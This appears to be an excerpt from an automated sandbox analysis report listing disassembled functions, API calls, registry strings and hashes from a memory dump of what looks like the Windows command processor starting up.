                                                                                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000), ref: 00EEAA09
                                                                                                                                                                                                                                                                                                                                                      • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00EEAA12
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: EnvironmentHeapStrings$AllocateFreeProcessmemcpy
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 429350006-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1eadcfa16cf8abcc883b595aa7d1f91e8f37eacca142b6e6d7d6d106f9006c0c
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: cbaf85e0404c902eca0499886462bf858507e4e38785ed7c1d60c6d6dc4a5844
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1eadcfa16cf8abcc883b595aa7d1f91e8f37eacca142b6e6d7d6d106f9006c0c
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6E0927760162827C231276A2C89C6F3A9EDBC8671B0A0034F909E3201DE348C139AB3
                                                                                                                                                                                                                                                                                                                                                      Function 00EF6EC0 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_00016E70), ref: 00EF6EC5
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 0fc44b8729dbf1ecef37b0d5db71997ea7ec346bd2e65f76600e08b46a39083e
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: c066d41f9b9e1b2e6042bef32d3f7bfd29ddf54589cd9615530a72f95ddb12a8
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0fc44b8729dbf1ecef37b0d5db71997ea7ec346bd2e65f76600e08b46a39083e
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 459002B52922088B961097719C0941576B15B486027815490E151D9054DB6441056526
                                                                                                                                                                                                                                                                                                                                                      Function 00EE87CA Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 270memorylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 0 ee87ca-ee8870 InitializeCriticalSection EnterCriticalSection LeaveCriticalSection SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call eee310 call eea9d4 call ee8b96 call ee8273 GetCommandLineW 9 ee8873-ee887c 0->9 9->9 10 ee887e-ee888a 9->10 11 ee8b37-ee8b38 10->11 12 ee8890-ee889f call ef1a05 10->12 13 ee8b3d-ee8b43 call ee78e4 11->13 18 ee8b2f-ee8b35 12->18 19 ee88a5-ee88db GetCommandLineW call eef3a0 call eee3f0 12->19 20 ee8b44-ee8b4c call ef7d18 13->20 18->13 19->18 27 ee88e1-ee88e9 19->27 28 ee88eb 27->28 29 ee88f0-ee8903 call ee8e9e call ef00e9 27->29 28->29 34 ee8906-ee890f 29->34 34->34 35 ee8911-ee8930 call eea24c 34->35 38 ee8934-ee893d 35->38 39 ee8932 35->39 40 ee893f-ee8943 38->40 41 ee89ab-ee89e1 GetConsoleOutputCP GetCPInfo call ee8572 GetProcessHeap HeapAlloc 38->41 39->38 43 ee8947-ee8951 40->43 44 ee8945 40->44 47 ee89fd-ee8a03 41->47 48 ee89e3-ee89f1 GetConsoleTitleW 41->48 43->41 46 ee8953-ee895a 43->46 44->43 46->41 49 ee895c-ee895e 46->49 51 ee8a05-ee8a0f call ee9a11 47->51 52 ee8a51-ee8a57 47->52 48->47 50 ee89f3-ee89fa 48->50 53 ee8962-ee8979 call ee78e4 49->53 54 ee8960 49->54 50->47 51->52 64 ee8a11-ee8a1b 51->64 56 ee8abb-ee8b08 GetModuleHandleW GetProcAddress * 3 52->56 57 ee8a59-ee8a8b call f070d6 call ee4d08 call ee63bd call ee9950 52->57 65 ee897b 53->65 66 ee8980-ee898f GetWindowsDirectoryW 53->66 54->53 62 ee8b0a-ee8b0d 56->62 63 ee8b14-ee8b16 56->63 87 ee8a8d-ee8aa5 call ee9950 * 2 57->87 88 ee8aa7-ee8ab0 call ee78e4 57->88 62->63 68 ee8b0f-ee8b12 62->68 69 ee8b17-ee8b28 free call ef6b30 63->69 70 ee8a4c call f08496 64->70 71 ee8a1d-ee8a32 GetStdHandle GetConsoleScreenBufferInfo 64->71 65->66 66->20 72 ee8995-ee899d 66->72 68->63 68->69 75 ee8b2d-ee8b2e 69->75 70->52 76 ee8a34-ee8a3e 71->76 77 ee8a40-ee8a4a 71->77 78 ee899f 72->78 79 ee89a4-ee89a6 call ee8bc7 72->79 76->52 77->52 77->70 78->79 79->41 94 ee8ab1-ee8ab5 GlobalFree 87->94 88->94 94->56
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00F1CA04), ref: 00EE87EE
                                                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00EE87FA
                                                                                                                                                                                                                                                                                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00EE880E
                                                                                                                                                                                                                                                                                                                                                      • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(00F07460,00000001), ref: 00EE881B
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EE8828
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleMode.KERNELBASE(00000000), ref: 00EE8830
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EE883C
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleMode.KERNELBASE(00000000), ref: 00EE8844
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE310: _get_osfhandle.MSVCRT ref: 00EEE318
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE310: SetConsoleMode.KERNELBASE(00000000), ref: 00EEE322
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE310: _get_osfhandle.MSVCRT ref: 00EEE32F
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE310: GetConsoleMode.KERNELBASE(00000000), ref: 00EEE339
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE310: _get_osfhandle.MSVCRT ref: 00EEE35E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE310: GetConsoleMode.KERNELBASE(00000000), ref: 00EEE368
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE310: _get_osfhandle.MSVCRT ref: 00EEE390
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE310: SetConsoleMode.KERNELBASE(00000000), ref: 00EEE39A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEA9D4: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00EEA9C5), ref: 00EEA9D8
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEA9D4: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00EEA9F3
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEA9D4: RtlAllocateHeap.NTDLL(00000000), ref: 00EEA9FA
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEA9D4: memcpy.MSVCRT(00000000,00000000,00000000), ref: 00EEAA09
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEA9D4: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00EEAA12
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8B96: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,00EE885E), ref: 00EE8B9D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8B96: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EE885E), ref: 00EE8BA4
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8273: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 00EE82D3
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8273: RegQueryValueExW.KERNELBASE(?,DisableUNCCheck,00000000,?,?,?), ref: 00EE8313
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8273: RegQueryValueExW.KERNELBASE(?,EnableExtensions,00000000,00000001,?,00001000), ref: 00EE834D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8273: RegQueryValueExW.KERNELBASE(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 00EE839D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8273: RegQueryValueExW.KERNELBASE(?,DefaultColor,00000000,00000001,?,00001000), ref: 00EE83D7
                                                                                                                                                                                                                                                                                                                                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00EE886A
                                                                                                                                                                                                                                                                                                                                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00EE88A5
                                                                                                                                                                                                                                                                                                                                                      • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000000,-00000105,00000000), ref: 00EE8987
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleOutputCP.KERNELBASE(?,?,00000000,-00000105,00000000), ref: 00EE89AB
                                                                                                                                                                                                                                                                                                                                                      • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00F1C9F0), ref: 00EE89BC
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8572: GetLocaleInfoW.KERNELBASE(00000000,0000001E,00F1C9E0,00000008), ref: 00EE859E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 00EE85BC
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00EE8614
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00EE8653
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,00F1C9D0,00000008), ref: 00EE867D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,00F1C970,00000020), ref: 00EE8698
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,00F1C930,00000020), ref: 00EE86B0
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000020C), ref: 00EE89CD
                                                                                                                                                                                                                                                                                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00EE89D4
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleTitleW.KERNELBASE(00000000,00000104), ref: 00EE89E9
                                                                                                                                                                                                                                                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?), ref: 00EE8A23
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00EE8A2A
                                                                                                                                                                                                                                                                                                                                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00EE8AB5
                                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL), ref: 00EE8AC0
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,CopyFileExW), ref: 00EE8AD1
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(IsDebuggerPresent), ref: 00EE8AE7
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(SetConsoleInputExeNameW), ref: 00EE8AF8
                                                                                                                                                                                                                                                                                                                                                      • free.MSVCRT(?), ref: 00EE8B18
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Console$Info$Locale$HeapMode_get_osfhandle$QueryValue$AddressCriticalProcProcessSection$AllocCommandEnvironmentFreeHandleLineStrings$AllocateBufferCtrlDirectoryEnterGlobalHandlerInitializeLeaveModuleOpenOutputScreenTitleWindowsfreememcpy
                                                                                                                                                                                                                                                                                                                                                      • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3313898297-3021193919
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6627f93c69d8e61b97100ac6bc1ef889ab94ac77e1d463ddfa93eac5d0ef80d4
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ec5096b2b8faa6c3421d61dbb44c10121b23ddf9a18e1c9988f0f568e4cbbdbf
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6627f93c69d8e61b97100ac6bc1ef889ab94ac77e1d463ddfa93eac5d0ef80d4
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56910A71A0038C9BDB24EBB69D5AA7A37A5EF84744B045019F50AE71A2DF718C42EB12
                                                                                                                                                                                                                                                                                                                                                      Function 00EE8273 Relevance: 47.6, APIs: 18, Strings: 9, Instructions: 309registryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 96 ee8273-ee82b7 call ef7f80 99 ee82bd-ee82db RegOpenKeyExW 96->99 100 ee8540-ee854c 99->100 101 ee82e1-ee831b RegQueryValueExW 99->101 100->99 102 ee8552-ee8571 time srand call ef6b30 100->102 103 efb0f1-efb0f8 101->103 104 ee8321-ee8355 RegQueryValueExW 101->104 106 efb10d-efb114 103->106 107 efb0fa-efb108 103->107 108 ee8357-ee835e 104->108 109 ee8371-ee83a5 RegQueryValueExW 104->109 106->104 113 efb11a-efb134 _wtol 106->113 107->104 114 efb139-efb140 108->114 115 ee8364-ee836a 108->115 110 ee83ab-ee83df RegQueryValueExW 109->110 111 efb165-efb16c 109->111 116 ee83fb-ee842f RegQueryValueExW 110->116 117 ee83e1-ee83e8 110->117 119 efb16e-efb17c 111->119 120 efb181-efb188 111->120 113->104 114->109 118 efb146-efb160 _wtol 114->118 115->109 124 ee846c-ee84a0 RegQueryValueExW 116->124 125 ee8431-ee8438 116->125 122 ee83ee-ee83f5 117->122 123 efb1ad-efb1b4 117->123 118->109 119->110 120->110 121 efb18e-efb1a8 _wtol 120->121 121->110 122->116 123->116 126 efb1ba-efb1cb wcstol 123->126 129 efb24c-efb254 124->129 130 ee84a6-ee84ad 124->130 127 ee843e-ee844e 125->127 128 efb1d3-efb1da 125->128 126->128 133 ee8454-ee845d 127->133 134 efb200-efb202 127->134 131 efb1dc-efb1ed wcstol 128->131 132 efb1f5 128->132 137 efb25a-efb25d 129->137 135 efb20f-efb216 130->135 136 ee84b3-ee84c3 130->136 131->132 132->134 138 efb203-efb20a 133->138 139 ee8463-ee8466 133->139 134->138 142 efb218-efb229 wcstol 135->142 143 efb231 135->143 140 efb23c-efb23e 136->140 141 ee84c9-ee84d2 136->141 145 ee84f4 137->145 146 efb263-efb269 137->146 138->124 139->124 139->138 144 efb23f-efb241 140->144 141->144 147 ee84d8-ee84db 141->147 142->143 143->140 144->129 148 efb26e-efb271 145->148 149 ee84fa-ee852e RegQueryValueExW 145->149 146->149 147->144 150 ee84e1-ee84eb 147->150 148->149 153 efb277-efb27e 148->153 151 ee8534 149->151 152 efb283-efb28a 149->152 150->137 154 ee84f1 150->154 151->100 155 efb28c-efb2b5 ExpandEnvironmentStringsW 152->155 156 efb2d9-efb2e1 152->156 153->149 154->145 158 efb2ca-efb2cc 155->158 159 efb2b7-efb2c8 call eef3a0 155->159 156->151 157 efb2e7-efb2f4 call eeacb0 156->157 157->151 162 efb2d3 158->162 159->162 162->156
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 00EE82D3
                                                                                                                                                                                                                                                                                                                                                      • RegQueryValueExW.KERNELBASE(?,DisableUNCCheck,00000000,?,?,?), ref: 00EE8313
                                                                                                                                                                                                                                                                                                                                                      • RegQueryValueExW.KERNELBASE(?,EnableExtensions,00000000,00000001,?,00001000), ref: 00EE834D
                                                                                                                                                                                                                                                                                                                                                      • RegQueryValueExW.KERNELBASE(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 00EE839D
                                                                                                                                                                                                                                                                                                                                                      • RegQueryValueExW.KERNELBASE(?,DefaultColor,00000000,00000001,?,00001000), ref: 00EE83D7
                                                                                                                                                                                                                                                                                                                                                      • RegQueryValueExW.KERNELBASE(?,CompletionChar,00000000,00000001,?,00001000), ref: 00EE8427
                                                                                                                                                                                                                                                                                                                                                      • RegQueryValueExW.KERNELBASE(?,PathCompletionChar,00000000,00000001,?,00001000), ref: 00EE8498
                                                                                                                                                                                                                                                                                                                                                      • RegQueryValueExW.KERNELBASE(?,AutoRun,00000000,00000004,?,00001000), ref: 00EE8526
                                                                                                                                                                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 00EE853A
                                                                                                                                                                                                                                                                                                                                                      • time.MSVCRT(00000000), ref: 00EE8554
                                                                                                                                                                                                                                                                                                                                                      • srand.MSVCRT ref: 00EE855B
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: QueryValue$CloseOpensrandtime
                                                                                                                                                                                                                                                                                                                                                      • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor$p~]u
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 145004033-72510396
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 66ddf30fb29840160c8d349701b82eb78b9592e7ef09a4b41dfe13c5867e247f
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: a590f1952d9a395405b0e2d69eff09b70951936c219d18d895e7a20fae1fb5bc
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66ddf30fb29840160c8d349701b82eb78b9592e7ef09a4b41dfe13c5867e247f
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DEC16E3590029DDAEB328B51DD04BE9B7B8FB08706F1090E6E689F2190DBB05EC5DF65
                                                                                                                                                                                                                                                                                                                                                      Function 00EF09B1 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 242registrythreadmemoryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 276 ef09b1-ef0a12 GetCurrentThreadId OpenThread call eee2af HeapSetInformation RegOpenKeyExW 279 ef0a18-ef0a50 call ef1f5b call ef1f1a call ee87ca 276->279 280 efe9c5-efe9f0 RegQueryValueExW 276->280 289 ef0a55-ef0a59 279->289 286 efe9f5-efea03 call ee63bd call f04840 280->286 295 efea08-efea10 call ef1e70 286->295 289->286 291 ef0a5f-ef0a66 289->291 293 ef0a6c-ef0a81 _setjmp3 291->293 294 efea58-efea6d _setjmp3 291->294 296 efea1c-efea24 293->296 297 ef0a87 293->297 298 efea6f-efea71 294->298 299 efea82-efea85 294->299 312 efea12 295->312 301 ef0a8a-ef0a8c 296->301 302 efea2a-efea2d 296->302 297->301 298->299 305 efea73-efea7b call ef1e70 298->305 303 efeaaa-efeab3 call eedd98 299->303 304 efea87-efea95 call ee63bd call f04840 299->304 309 ef0a8e 301->309 310 ef0ac5-ef0ac7 301->310 302->301 322 efeac6-efeac7 call ef62c0 303->322 323 efeab5-efeac5 _setmode 303->323 329 efea9a-efeaa2 call ef1e70 304->329 319 efea7d 305->319 317 ef0a90-ef0a96 309->317 314 ef0acd-ef0ad5 call ef1e70 310->314 315 efea52 310->315 312->296 335 ef0ad7 314->335 315->294 324 ef0a98-ef0a9c 317->324 325 ef0ae0-ef0af1 call eec570 317->325 328 efeb7f 319->328 332 efeacc-efeaff EnterCriticalSection LeaveCriticalSection call eec570 322->332 323->322 324->317 327 ef0a9e-ef0aba call eee310 GetConsoleOutputCP GetCPInfo call eee2af 324->327 341 ef0af7-ef0afa 325->341 342 efea41-efea49 call ef1e70 325->342 352 ef0abf 327->352 346 efeaa4 329->346 351 efeb01-efeb04 332->351 340 ef0ada exit 335->340 340->325 347 efea32-efea3a call ef1e70 341->347 348 ef0b00-ef0b04 call eee470 341->348 358 efea4b-efea4d 342->358 346->303 360 efea3c 347->360 354 ef0b09-ef0b0b 348->354 356 efeb06-efeb70 EnterCriticalSection LeaveCriticalSection GetConsoleOutputCP GetCPInfo call eee2af call eee470 call eee310 GetConsoleOutputCP GetCPInfo call eee2af 351->356 357 efeb75-efeb7d call ef1e70 351->357 352->310 354->324 359 ef0b0d-ef0b10 354->359 356->332 357->328 358->340 359->324 360->328
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00EF09CB
                                                                                                                                                                                                                                                                                                                                                      • OpenThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(001FFFFF,00000000,00000000), ref: 00EF09D8
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE2AF: SetThreadUILanguage.KERNELBASE ref: 00EEE2C6
                                                                                                                                                                                                                                                                                                                                                      • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 00EF09ED
                                                                                                                                                                                                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\Policies\Microsoft\Windows\System,00000000,00020019,?), ref: 00EF0A0A
                                                                                                                                                                                                                                                                                                                                                      • _setjmp3.MSVCRT ref: 00EF0A72
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleOutputCP.KERNELBASE ref: 00EF0AA3
                                                                                                                                                                                                                                                                                                                                                      • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00F1C9F0), ref: 00EF0AB4
                                                                                                                                                                                                                                                                                                                                                      • exit.KERNELBASE ref: 00EF0ADA
                                                                                                                                                                                                                                                                                                                                                      • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableCMD,00000000,?,?,?), ref: 00EFE9E1
                                                                                                                                                                                                                                                                                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00EFE9EA
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1F5B: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,00000000,?,00000000,?,?,?,?,?,?,00EFEF7C,?,00000000,00000000), ref: 00EF1FB2
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1F5B: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,?,?,?,?,?,?,00EFEF7C,?,00000000,00000000), ref: 00EF1FCE
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1F1A: GetConsoleOutputCP.KERNELBASE(00EF0A41), ref: 00EF1F1A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1F1A: GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00F1C9F0), ref: 00EF1F2B
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1F1A: memset.MSVCRT ref: 00EF1F45
